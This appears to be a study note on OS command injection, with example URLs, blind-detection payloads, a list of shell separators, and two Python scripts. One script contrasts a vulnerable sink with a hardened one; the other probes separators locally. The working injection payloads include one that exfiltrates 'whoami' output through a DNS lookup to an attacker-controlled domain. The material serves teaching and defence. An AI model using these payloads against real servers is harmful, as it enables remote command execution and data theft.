
What is it?

OS command injection (shell injection): the application builds an operating-system command from user-supplied input and hands it to a shell, so an attacker can append their own commands and get RCE on the server. The shape is like path traversal (unvalidated input reaching a sensitive sink), but the sink is a shell instead of the filesystem.
An example: suppose this is a valid URL:

https://insecure-website.com/stockStatus?productID=381&storeID=29

And in the backend, the parameters are used to call a system command:

stockreport.pl 381 29

Then sending the following input (productID left empty, followed by "& echo aiwefwlguh &", URL-encoded)

https://insecure-website.com/stockStatus?productID=&+echo+aiwefwlguh+&storeID=29

makes the backend run

stockreport.pl & echo aiwefwlguh & 29

which the shell splits into three commands: stockreport.pl with no arguments, echo aiwefwlguh, and 29. The output shows all three:

Error - productID was not provided
aiwefwlguh
29: command not found

The random marker string showing up in the response proves the injected echo was executed.
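The backend from the example above, written once the vulnerable way (parameters pasted into a command line that a shell parses) and once hardened (allow-list validation plus an argv array, so no shell is involved). This is an added example, not code from the original page: "stockreport.pl" is the page's example script name and is not installed, so the shell simply reports it as not found, which matches the output shown; the "echo" stand-in used in the demo calls is an assumption to make the argv variant observable.

```python
import re
import subprocess

# "stockreport.pl" is the page's example script; not installed here (assumption:
# the shell prints "not found" for it, exactly as in the page's output).
REPORT_CMD = "stockreport.pl"


def stock_status_vulnerable(product_id, store_id, report_cmd=REPORT_CMD):
    """VULNERABLE: the parameters are concatenated into a command line that
    /bin/sh parses, so '&', ';', '|' ... in the input become separators."""
    cmd = f"{report_cmd} {product_id} {store_id}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    # stderr carries the "not found" noise; the injected echo lands on stdout.
    return proc.stdout


ID_RE = re.compile(r"[0-9]{1,10}")


def is_valid_id(value):
    """Allow-list: an identifier is one to ten ASCII digits and nothing else."""
    return bool(ID_RE.fullmatch(value))


def run_report_argv(product_id, store_id, report_cmd=REPORT_CMD):
    """No shell: arguments go to the program as an argv array, so a separator
    in the input is just a literal argument, never a command boundary."""
    proc = subprocess.run([report_cmd, product_id, store_id],
                          capture_output=True, text=True)
    return proc.stdout


def stock_status_hardened(product_id, store_id, report_cmd=REPORT_CMD):
    """Hardened: reject anything outside the allow-list, then avoid the shell.
    Either measure alone helps; together they cover each other's gaps."""
    if not (is_valid_id(product_id) and is_valid_id(store_id)):
        raise ValueError("productID and storeID must be numeric")
    return run_report_argv(product_id, store_id, report_cmd)


if __name__ == "__main__":
    payload = "& echo aiwefwlguh &"  # the page's marker payload, URL-decoded
    # Vulnerable sink: the marker is printed, i.e. the echo ran.
    print(repr(stock_status_vulnerable(payload, "29")))
    # argv sink with "echo" standing in for the script: payload is a literal.
    print(repr(run_report_argv(payload, "29", report_cmd="echo")))
    try:
        stock_status_hardened(payload, "29")
    except ValueError as err:
        print("rejected:", err)
```

Note that run_report_argv alone already defuses the separators, but the script still receives attacker-controlled arguments (a Perl script might pass them to its own shell calls), which is why the allow-list stays in the hardened path.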

Possible vectors

Blind (no output in the response). Example: a feedback form whose backend sends mail, so nothing the command prints comes back to the user:

mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com

To detect the injection, make the command take measurable time:

& ping -c 10 127.0.0.1 &

Remember the -c 10, otherwise ping runs forever on Linux. With 127.0.0.1 the only signal is the delay: the response should take about 10 seconds longer than normal. Alternatively, ping a host you control instead of 127.0.0.1 (pings to 127.0.0.1 never leave the target) and watch for the ICMP packets there with

tcpdump -i eth0 icmp
tcpdump -nni eth0 icmp # Without name resolution

on that controlled system.

Blind, redirected output: write the command output into a file under the web root, then fetch the file through the web server afterwards:

& whoami > /var/www/static/whoami.txt &

Blind out-of-band (OAST, out-of-band application security testing): make the target do a DNS lookup for a domain you control:

& nslookup kgji2ohoyw.web-attacker.com &

With an inline command, its result (here the user name) is exfiltrated as part of the queried host name:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

The lookups are observed with Burp Collaborator (or an authoritative DNS server you control for the domain).

Separators

These separators can be used to chain an injected command (on both Windows and Unix):

  • &
  • &&
  • |
  • ||

Only on Unix:

  • ;
  • newline (0x0a or \n)

Also on Unix you can use inline execution (the injected command runs and its output is substituted into the command line):

  • `command` (backticks)
  • $(command)

Sometimes the input lands inside a quoted string of the command, so the quote must be terminated first (with " or ') before a separator takes effect.
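A probe that tries each Unix separator above against the page's string-built sink and detects success blind, through a side effect, the way the whoami.txt trick in the "redirected output" section does. This is an added example, not code from the original page. Assumptions: a POSIX /bin/sh (Windows cmd would behave differently), "id" as the probe command, a temporary directory standing in for the web root, and "stockreport.pl" (the page's script name) not being installed, so the first command in each chain fails.

```python
import os
import subprocess
import tempfile

# The page's example script; assumed absent, so the first command in the
# chain fails. That is what makes "&&" behave differently from the rest.
REPORT_CMD = "stockreport.pl"

SEPARATORS = ["&", "&&", "|", "||", ";", "newline", "backtick", "$()"]


def vulnerable_sink(product_id, store_id):
    """Same string-concatenation sink as the page's backend. The output is
    discarded (blind); capturing it only makes us wait for background jobs."""
    subprocess.run(f"{REPORT_CMD} {product_id} {store_id}",
                   shell=True, capture_output=True)


def payload(separator, cmd):
    """Build the productID value that injects cmd via the given separator."""
    if separator == "newline":
        return f"\n{cmd}\n"
    if separator == "backtick":
        return f"`{cmd}`"
    if separator == "$()":
        return f"$({cmd})"
    return f"{separator} {cmd} {separator}"


def probe_separators():
    """Return {separator: bool}: did the injected `id` actually run?
    Success is detected blind: `id` redirects its output into a marker file
    (a path without shell metacharacters), and we check the file exists."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for i, sep in enumerate(SEPARATORS):
            marker = os.path.join(tmp, f"marker{i}")
            vulnerable_sink(payload(sep, f"id > {marker}"), "29")
            results[sep] = os.path.exists(marker)
    return results


if __name__ == "__main__":
    for sep, ran in probe_separators().items():
        print(f"{sep!r:12} injected command ran: {ran}")
```

The one negative result, "&&", is a caveat worth remembering when a probe stays silent: the right-hand side of "&&" only runs if the left-hand command succeeded, and here the missing script fails. Against a real backend whose command succeeds, "&&" fires and "||" is the one that does not, so try both.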

40397ac9 (main) : 2023-01-11T20:40:16+01:00